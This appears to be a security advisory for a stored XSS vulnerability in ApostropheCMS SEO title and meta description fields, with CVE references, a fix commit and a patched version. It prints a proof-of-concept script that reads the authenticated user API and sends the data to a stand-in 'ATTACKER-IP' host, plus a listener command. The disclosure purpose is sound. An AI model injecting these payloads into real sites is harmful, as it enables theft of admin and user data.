A stored cross-site scripting (XSS) vulnerability exists in SEO-related fields (SEO Title and Meta Description) in ApostropheCMS.
Improper neutralization of user-controlled input in SEO-related fields allows injection of arbitrary JavaScript into HTML contexts, resulting in stored cross-site scripting (XSS). This can be leveraged to perform authenticated API requests and exfiltrate sensitive data, resulting in a compromise of application confidentiality.
ApostropheCMS (tested on version: v4.28.0)
User-controlled input in SEO fields is improperly handled and rendered into HTML contexts such as:
<title><meta> attributesThis allows attackers to inject and execute arbitrary JavaScript in the context of authenticated users.
The following payload demonstrates breaking out of HTML context:
"></title><script>alert(1)</script>
This confirms:
- Improper output encoding
- Ability to escape <title> / <meta> contexts
- Arbitrary script execution
This PoC demonstrates how the stored XSS can be leveraged to perform authenticated API requests and exfiltrate sensitive data.
"></title><script>
fetch('/api/v1/@apostrophecms/user', {
credentials:'include'
})
.then(r=>r.text())
.then(d=>{
fetch('http://ATTACKER-IP:5656/?data='+btoa(d))
})
</script>
Watch the following YouTube video for a full demonstration of the exploit:
PoC Video: https://youtu.be/FZuulua_pa8
python3 -m http.server 5656"></title><script>
fetch('/api/v1/@apostrophecms/user',{
credentials:'include'
})
.then(r=>r.text())
.then(d=>{
fetch('http://ATTACKER-IP:5656/?data='+btoa(d))
})
</script>
/api/v1/@apostrophecms/userroles (including admin)
The data is exfiltrated to the attacker-controlled server:
http://ATTACKER-IP:5656GET /?data=BASE64_ENCODED_RESPONSEThis vulnerability allows an attacker to:
- Execute arbitrary JavaScript in an authenticated admin context
- Perform authenticated API requests (session riding)
- Access sensitive application data via internal APIs
- Exfiltrate sensitive data to an external attacker-controlled server
## References
- Fix commit: https://github.com/apostrophecms/apostrophe/commit/0e57dd07a56ae1ba1e3af646ba026db4d0ab5bb3
- https://www.cve.org/CVERecord?id=CVE-2026-35569
- https://nvd.nist.gov/vuln/detail/CVE-2026-35569
- https://github.com/Chittu13/cve-research/tree/main/CVE-2026-35569
| Score | Percentile |
|---|---|
| 0.03% | 9.28% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 8.7 | 3.1 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-855c-r2vq-c292 ↗ |
| CVE | CVE-2026-35569 ↗ |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| npm | apostrophe | <= 4.28.0 | 4.29.0 | — |